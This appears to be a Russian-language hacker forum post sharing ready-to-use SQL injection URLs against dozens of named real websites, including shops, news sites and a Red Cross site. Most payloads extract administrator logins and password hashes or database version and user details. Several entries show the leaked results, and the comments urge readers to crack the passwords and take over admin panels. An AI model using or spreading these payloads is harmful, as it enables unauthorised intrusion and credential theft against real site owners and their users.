SQL Инъекции

http://www.weddingcards.ru/catalog.php5?catid=3+and+1=0+union+select+1,group_concat%28table_name+separator+0x3a%29,3,4+from+information_schema.tables+where+table_schema=0x73697465736574755f776564--

ACCOUNT:BASKET:CATEGORY:ITEM:ORDER_SEQUENCEHOTO:SERVICE:SESSION_LOG:TEXT
Догадываетесь, какое поле взять?!

 

http://www.globaltech.by/catalog.php?catId=7+and+1=0+union+select+group_concat%28concat_ws%280x3a3a3a,Id,name,login,pass,accesslevel,Id,name,login,pass,accesslevel%29+separator+0x0b%29+from+users+limit+0,20--&sId=35&item=222
----
http://www.dried.su/catalog.php?do=more&catid=3+and+1=0+union+select+1,2,group_concat%28concat_ws%280x3a3a3a,id,login,password,email,rights,new_password%29+separator+0x0b%29,4,5,6,7,8,9+from+cms_administrators+limit+0,20--&id=27

 

http://www.visiodance.ru/catalog/?dance=-1%20and%201=2%20union%20all%20select%201,2,3,4,5,aes_decrypt(aes_encrypt(concat_ws(char(58),@@version,user(),database()),0x71),0x71),7,8,9,10,11,12,13,14,15,16,17,18,19+--

5.1.56-log visiodance@localhost visiodance

пассы не расшифровал.....дерзайте

 

http://www.aksline.ru/index.php?catid=11+and+1=0+union+select+1,2,group_concat%28table_name+separator+0x3a%29,4,5,6,7,8+from+information_schema.tables+where+table_schema=0x616b736c696e65--
Дерзайте, поле с админкой прямо перед носом!

 

http://radio.tut.by/area.php?id=-17+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+&folder=people

 

http://www.iorta.com/catalog.php?catid=-47+and+1=0+union+select+unhex%28hex%28concat_ws%280x3a3a3a,user%28%29,database%28%29,version%28%29%29%29%29,2--

 

очуметь
там 687 таблиц

 

http://www.fishres.ru/news/news.php?id=-18167+and+1=2+union+select+1,2,concat_ws(0x3a,@@version,user(),database()),4,5,6,7,8,9+--

4.0.27-log [email protected] murfish4_test

 

Провайдер.

http://www.opensys.ro/content.php?id=-16%27+union+select+1,2,3,version%28%29,5--+

 

Это ещё не так много)

 

http://www.smdailyjournal.com/article_preview.php?id=66988+and+1=2+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15--+

4.0.25:smdaily2@localhost:smdaily2

----------------------------

http://www.scooterpart.net/products.php?id=175+and+1=2+UnIon+selECt+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14+from+admins--+

---------------------------

http://www.repropaint.com/Davinci/detail.php?Id=368+and+1=2+UnIon+selECt+1,concat_ws(0x3a,id,naam,paswoord),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+login--+

--------------------------

http://www.reichenwies.de/shop/product_details.php?id=65+and+1=2+UnIon+selECt+1,2,concat_ws(0x3a,u_name,u_password,u_privilege),4,5,6,7,8,9,10,11,12+from+fs_users--+

------------------------

http://www.racemotorparts.com/products.php?id=1053+and+1=2+UnIon+selECt+1,2,concat_ws(username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+admins--+

----------------------

http://www.ppfmaster.ru/news.php?id=1+and+1=2+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6--+

5.0.92-community-logpfmaste_admin@localhostpfmaste_news

----------------------

http://www.onlinewholesale.us/goods.php?id=143+and+1=2+union+select+1,2,3,concat_ws(0x3a,adminname,adminpass),5+from+w_admin--+

----------------------

http://www.olemiss.edu/debate/debate_news/details.php?id=58'+and+1=2+union+select+1,unhex(hex(concat_ws(0x3a,version(),user(),database()))),3,4,5,6,7--+

5.1.30-log:cirlot@localhost:cirlot

 

http://100.tut.by/area.php?id=-20+UnIon+selECt+1,2,radio_account_login,4,5,radio_account_password,7,8,9,10,11,12,13,14,15,16,17,18,19+from+radio_account+limit+0,1+--+

 

http://www.vw-club.ru/vw/news/show_news.php?id=700+and+1=0+union+select+1,hex%28database%28%29%29,3,4,5,6--

 

http://www.redcross.ru/news.php?nid=-190+union+select+1,2,3,4,group_concat(0x0b,login,0x3a,password)+from+redcross_sql.b_admin+--+
тиц: 250 пр: 5
File_Priv: no

 

тиц:10 pr:5

4.1.22-standard:thefanli_backend:thefanli_senior@localhost

pr:3

4.1.24-max-log:asuntojafi:[email protected]

pr:3

5.0.88:chiptec0:chiptec0@localhost

pr:3

5.0.92-community:algerie:sam@localhost

pr:1 тиц:30

5.0.70-log:gb_dogstatus:[email protected]

 

Code:

http://www.akkords.ru/news.php?nid=-8 union select 1,2,3,group_concat(concat_ws(0x3a,id,name,nick,mail,login,pass,band),'<br>'),5,6,7 FROM admin--

тиц 230

 

БОЯН:

для тех кто не вкурсе, боян смотрим так:

pr:6 тиц:30

y12user@y12web4:5.1.35:y12doegov
pr:6

root@localhost:5.0.22:new

pr:6 тиц:30

4.1.11:webuser@localhostublic_relations

 

Code:

https://www.dezinfector.ru/?new_id=-7+union+select+1,2,3,concat_ws%280x3a,login,password%29,5,6+from+drweb_cms_user--

 

два шопи )))

Code:

http://www.tribbletoys.com/product_info.php?id=5-999.9+union+select+1,2,version(),database(),5,6,7,8,9,10--

5.0.91-log \**/tribbles

Code:

http://theshopnewyork.com/productinfo.php?id=1189-999.9+union+select+1,version(),database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

5.0.91-log \**/gomezny_products

 

documents:newsublications:vacancies